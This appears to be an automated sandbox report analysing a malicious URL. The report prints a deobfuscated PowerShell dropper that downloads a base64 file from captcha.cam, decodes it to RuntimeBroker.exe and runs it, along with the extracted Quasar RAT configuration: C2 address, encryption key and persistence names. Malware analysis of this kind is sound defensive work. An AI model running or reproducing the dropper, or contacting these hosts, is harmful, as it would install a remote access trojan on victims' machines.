Resubmissions

30/12/2024, 03:24 UTC

241230-dyd5xswqbv 10

30/12/2024, 03:20 UTC

241230-dvvy9swpcy 10

General

  • Target

    http://medai.tv

  • Sample

    241230-dyd5xswqbv

Malware Config

Extracted

Language
ps1
Deobfuscated

$url = "https://captcha.cam/file.b64"
$b64file = "$env:Temp\\file.b64"
$exefile = "$env:Temp\\RuntimeBroker.exe"
invoke-webrequest -uri $url -outfile $b64file
[io.file]::writeallbytes("$env:Temp\\RuntimeBroker.exe", [convert]::frombase64string(get-content "$env:Temp\\file.b64" -raw))
start-process "$env:Temp\\RuntimeBroker.exe"

URLs
exe.dropper

https://captcha.cam/file.b64

Extracted

Family

quasar

Version

1.4.1

Botnet

28

C2

194.26.192.167:2768

Mutex

859d5f90-e2d0-4b2d-ba9f-5371df032ec2

Attributes
  • encryption_key

    BE2B0B270E4DB19CAA5C42E9D2EBF64645A2D055

  • install_name

    RuntimeBroker.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    RuntimeBroker

  • subdirectory

    RuntimeBroker

Targets

    • Target

      http://medai.tv

    • Quasar RAT

      Quasar is an open source Remote Access Tool.

    • Quasar family

    • Quasar payload

    • Modifies boot configuration data using bcdedit

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

    • A potential corporate email address has been identified in the URL: currency-file@1

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15
